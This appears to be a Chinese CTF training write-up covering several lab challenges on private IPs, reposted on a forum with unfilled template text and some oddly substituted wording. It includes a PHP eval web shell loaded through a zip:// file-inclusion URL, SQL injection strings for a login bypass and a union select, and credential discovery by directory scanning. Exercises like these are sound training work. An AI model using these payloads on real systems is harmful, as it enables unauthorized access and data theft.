安全实训五
安全杂项1.包罗万象包罗万象
题目内容:
有一天,小吉发现在网上探求好用的网盘,这时间他发现了这么一个网站。
题目分析:
对题目进行深入的分析,包括理解题目标要求、查找相关的资料、分析题目所涉及的技术或概念等。
https://img-blog.csdnimg.cn/direct/1ab902bf9f2247c592f122c3abc60ca6.png
解题过程:创建一个txt文件,写入<?php @eval($_POST['a']);?>,打包压缩成zip文件,上传得到其在服务器内的保存地点,然后粘贴到url=的后面写作http://192.168.210.79/index.php?url=zip:///var/www/html/upload/10569a05941f378d2dcf16da94101ec2.zip%23everything,然后enter,之后将链接粘贴进菜刀就可以跑出
https://img-blog.csdnimg.cn/direct/0e099309202d4f799655d14a06537f66.png
效果展示:https://img-blog.csdnimg.cn/direct/9ad3baddf17346da8036ddeb70a23f51.png
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
2.题目形貌:
白云新闻搜刮
题目分析:
中国又出现了一个搜刮巨头!据报道,中国网络大亨小明近日编写了一个搜刮引擎,叫白云新闻搜刮,具体链接在下方,该搜刮链接功能欠打,界面乏力,小明出一包辣条悬赏毛病,豪言入侵高手都去试试,你服不平?不平就去试试呗~(答案为flag{}形式,提交{}中内容即可)
IP信息:192.168.210.71
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
首先关js,刷新后可以绕过字符验证,之后用sql语句慢慢试探,先查找sql默认文件,比如:
1、TABLE_SCHEMA:数据库实例名称;
2、TABLE_NAME:数据存放对象表名称;
3、TABLE_TYPE:数据存放对象范例(表或视图);
4、TABLE_ROWS:数据量;
5、COLUMN_NAME:字段名称
6、COLUMN_COMMENT:字段解释
7、COLUMN_TYPE:字段范例
' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA--'
https://img-blog.csdnimg.cn/direct/ec954b7f6e63464183af61111154b11e.png
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。https://img-blog.csdnimg.cn/direct/9d0be13b1db746a6af2efc8d88b94505.png
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
admin123456
题目分析:
入门级入侵,你以为就如许你就能得分了?太鄙视admin 了。(答案为flag{}形式,提交{}中内容即可)IP信息:192.168.210.74
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
先关jsp,然后两个’or 1 or’,enter就完了https://img-blog.csdnimg.cn/direct/45528add8c054977a300a13a68077381.png
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。https://img-blog.csdnimg.cn/direct/7643f2fd60c2486f81b088b867d05b5b.png
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
我的生日
题目分析:
没耳朵的的猫,大家都喜欢,因为小口袋有许多多少东西。但是你知道他的生日么?(答案为flag{}形式,提交{}中内容即可)
IP信息:192.168.210.76
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
去网上搜哆啦A梦的生日,输入生日和验证码就完了
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。https://img-blog.csdnimg.cn/direct/78d9e04e2d764104ab6c86ac99b3160d.png
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
似乎有机密
题目分析:
这个word文件的内容看起来似乎有啥机密,解开看看吧
http://192.168.210.21/adl-oss/resources/ab19328c13074a1c80a87ec39bbdd389?token=400cc9e0-4adb-4ee9-97f3-eff540e20274&fileName&fileType=download
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
该换颜色,然后base64解密就完了https://img-blog.csdnimg.cn/direct/8e620c4043ec47cfbdb52885dc1401ca.png
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。https://img-blog.csdnimg.cn/direct/6e6e9329c52147fc8e276ebdce68f6c7.png
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
管理员的愤怒
题目分析:
阿水是某部分的网站管理员,一天他发现自己管理的网站被挂上了暗链,链接指向了一个IP。阿水非常愤怒,表示一定要给点对方颜色看看,但是这小子没学过渗透。下面给各位这个IP,看大家如何进入坏蛋的网站获得flag为阿水报仇。
IP信息:192.168.210.78
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
复制IP御剑扫描,扫出四个网址https://img-blog.csdnimg.cn/direct/ed7d877a960e44e69d40a213216add06.png
打开看看有什么https://img-blog.csdnimg.cn/direct/a8d96926622745979f75ab82bfe5e43a.png
在db.phps文件中有数据库密码,下载打开,查看https://img-blog.csdnimg.cn/direct/e4db2f4a7fc64ce09b9b9109c6f80eba.png
在打开网页http://192.168.210.78/dbadmin登录,找到flaghttps://img-blog.csdnimg.cn/direct/c3c136d71bc54c578735ca1ec522850a.pnghttps://img-blog.csdnimg.cn/direct/e82d28edcbd64008a05b24461542a892.png
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。https://img-blog.csdnimg.cn/direct/b05d82c5d08746c1ba0f5ae1f581bd9f.png
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
题目形貌:
隐藏的钥匙
题目分析:
路飞一行人千辛万苦来到了巨大航道的终点,找到了传说中的One piece,但是必要钥匙才气打开One Piece大门,钥匙就隐藏在下面的图片中,聪明的你能帮路飞拿到钥匙,打开One
解题过程:
具体形貌解题的步骤、方法和过程截图,包括利用的工具、技术、碰到的挑战以及如何办理这些挑战等。
将图片用hxd打开,查找字符flag,https://img-blog.csdnimg.cn/direct/6b42dc6534644eeb895023c6ab68d540.png
将字符用base64剖析
效果展示:
展示解题的最闭幕果,包括得到的flag(标志)、分数或其他形式的验证。https://img-blog.csdnimg.cn/direct/bac7945321944b29ad5a440df20a7972.png
总结与反思:
对整个解题过程进行总结,分享解题的履历教训,以及大概的改进方向。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]